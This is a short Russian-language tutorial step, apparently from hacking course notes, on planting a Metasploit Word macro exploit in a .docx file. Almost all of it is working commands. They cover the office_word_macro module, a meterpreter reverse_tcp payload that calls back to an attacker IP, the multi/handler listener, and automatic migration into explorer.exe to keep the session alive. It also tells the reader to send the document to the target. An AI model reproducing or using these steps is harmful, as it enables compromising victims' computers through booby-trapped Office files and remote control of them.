5. Внедрение макроса в документ MS Office - 1-й способ
Sam SepiolДля начала воспользуемся поиском эксплоита:
search type:exploit macro
Используем эксплоит:
exploit/multi/fileformat/office_word_macro
далее устанавливаем пэйлоад:
set payload windows/meterpreter/reverse_tcp
посмотрим опции:
show options
Параметр CUSTOMTEMPLATE - содержит путь к готовому файлу, в который хотим внедрить код.
Параметр FILENAME - содержит имя выходного файла.
Параметр LHOST - адрес атакующего компьютера.
Установим эти параметры:
set customtemplate /root/Desktop/document.docx
set filename readme.docm
set lhost 192.168.1.12
exploit
Когда сработает эксплоит то он покажет путь в котором сохранился файл содержащий эксплоит.
После нужно запустить и установить слушатель:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.12
exploit
Сам документ можно закрыть, так как сессия метерпреттер не привязывается к документу, а создается другой процесс.
Узнать под каким процессом работает эксплоит на удаленной машине. Но нужен физический доступ что бы посмотреть.
getpid
Для того что бы сохранить сессию можно мигрировать в другой процесс:
Отображаются абсолютно все параметры модулей пэйлоад и эесплоит.
show advanced
нас интересуют параметры:
PrependMigrate
PrependMigrateProc
PrependMigrate - активирует автоматическое мигрирование процесса. Чтобы его включить достаточно включить - true.
PrependMigrateProc - содержит имя процесса в который необходимо инжектировать пэйлоад.
Установим перечисленные параметры:
set prependmigrate true
set prependmigrateproc explorer.exe
run
Снова отправляем файл и заново запускаем слушатель.
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.12
exploit